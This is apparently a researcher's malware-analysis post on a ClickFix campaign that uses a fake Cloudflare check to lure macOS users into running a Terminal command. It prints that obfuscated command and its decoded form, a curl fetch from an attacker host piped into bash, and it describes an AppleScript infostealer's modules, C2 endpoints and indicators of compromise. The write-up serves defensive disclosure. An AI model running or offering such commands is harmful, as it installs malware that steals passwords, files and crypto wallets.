A social engineering technique known as ClickFix has been gaining popularity recently. The attacker creates a fake authentication page mimicking CAPTCHA or Cloudflare protection, which prompts the user to run a command directly on their system—on Windows via the Win + R dialog, on macOS by opening Terminal via ⌘ + Spacebar.

If the user follows the instructions, the system is typically compromised by malware.

During a routine session on my iPad, I came across a page displaying an authentication window visually identical to a legitimate Cloudflare prompt:

cloudflare-window

After interacting with the window, the page prompted me to perform the following steps:

  1. Press ⌘ + Spacebar to open Spotlight
  2. Type Terminal and press Enter
  3. Paste and run the command displayed on the page

I recognized the command as potentially malicious, saved it for analysis, and did not run it.

Command Analysis

The captured command had the following form:

echo " Y3VybCAtc0wgIiQoZWNobyAnYUhSMGNITTZMeTl0Wld0dmFXeHpkV2hoY25WdExtTnZiUzlqYkM5cGJtUmxlQzV3YUhBPScgfCBiYXNlNjQgLWQpIiB8IG5vaHVwIGJ hc2ggJg==" | base64 -d | bash

The command decodes the Base64-encoded string and passes the result to the bash interpreter. Decoding the first layer gives us:

curl -sL "$(echo 'aHR0cHM6Ly9tZWtvaWxzdWhhcnVtLmNvbS9jbC9pbmRleC5waHA=' | base64 -d)" | nohup bash &

This is another layer of Base64—this time an encoded URL. The command downloads a remote script using curl -sL and runs it in the background via nohup bash &. After decoding the second layer, we obtain the final URL payload:

curl -sL https://mekoilsuharum.com/cl/index.php | nohup bash &

To analyze the payload without risk of infection, I modified the command so that the script is only downloaded without being executed:

curl -sL https://mekoilsuharum.com/cl/index.php > payload.applescript

Payload Analysis

The downloaded file turned out to be a full-fledged infostealer written in AppleScript, targeting macOS systems. I uploaded the script to VirusTotal – analysis results here.

Modules

1. Data collection from browsers

  • Steals cookies, login credentials, form history, and password databases from Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera, Arc, etc.) and from the Firefox family of browsers (Firefox, Waterfox).
  • Targets over 200 browser extension IDs, primarily crypto wallets—MetaMask, Phantom, Coinbase Wallet, and others.

2. Cryptocurrency wallet theft

  • Desktop wallets: Electrum, Exodus, Atomic, Ledger Live, Coinomi, Wasabi, Monero, Bitcoin Core, and others.
  • Browser wallets: via IndexedDB and Local Extension Settings.

3. File exfiltration

  • Scans the Desktop and Documents folders and targets the following file extensions: .txt, .pdf, .docx, .wallet, .key, .keys, .kdbx.
  • Steals the Apple Notes database (NoteStore.sqlite) including media attachments.
  • Steals Safari cookies and macOS Keychain (login.keychain-db).

4. Obtaining the System Password

  • If the account has no password, it attempts to extract the Chrome encryption key using the security utility.
  • If the account is password-protected, it displays a fake system dialog titled “macOS Protection Service” and repeatedly prompts the user to enter the password. It verifies the password using dscl authonly.

5. Data exfiltration

  • It compresses the collected data using the ditto tool into the /tmp/alego.zip archive.
  • It sends the archive via an HTTP POST request to the C2 server.
  • After successful transmission, it deletes all temporary files and traces of its activity.

6. Update mechanism (commented out)

  • The script contains the toast() function, which is capable of downloading and replacing any application in /Applications/. It likely serves to ensure persistence or to trojanize legitimate software. In the analyzed version, this function is disabled.

Network Infrastructure

Domain           Purpose
mekoilsuharum.com/cl/index.php         Distribution server – hosts the payload
api.uterimoxis.com/api/data/receive     C2 server – receiving exfiltrated data (POST)
api.uterimoxis.com/api/health          C2 Server – Connection Control Endpoint
gamma.api.uterimoxis.com           Dropper/update endpoint (commented out)

Every request to the C2 server contains the header X-Bid: f48fbe39836779cadbf148b5952919fd, which serves as a campaign or bot identifier.

Tactics, Techniques and Procedures (TTPs)

The following techniques correspond to the MITRE ATT&CK classification:

ID        Title Description
T1555.001     Credentials from Password Stores: Keychain      Extracting Passwords from macOS Keychain
T1539        Steal Web Session Cookie      Theft of session cookies from browsers
T1528        Steal Application Access Token      Theft of crypto wallet tokens
T1056.002     Input Capture: GUI Input Capture      A fake system dialog designed to steal passwords
T1041        Exfiltration Over C2 Channel      Sending data via HTTP to the C2 server
T1560        Archive Collected Data      Data compression prior to exfiltration

Indicators of Compromise (IOCs)

Files and paths:

  • /tmp/alego.zip
  • /tmp/stravy/
  • ~/.pwd
  • ~/.username

Network:

  • uterimoxis.com
  • mekoilsuharum.com

Processes / Behavior:

  • AppleScript dialog titled “macOS Protection Service” requesting the system password

Conclusion

This campaign combines social engineering (ClickFix), multiple layers of Base64 encoding for obfuscation, and a sophisticated AppleScript infostealer. The result is an attack that is difficult for the average user to detect and, if successful, provides the attacker with complete access to browser data, crypto wallets, files, and the system password.

If you see a prompt to run a command in Terminal as part of "verification," it is always an attack. No legitimate service requires this procedure.

Note I used AI exclusively for structural design and consultation recommendations while writing this article. The research and content themselves are the result of my own work.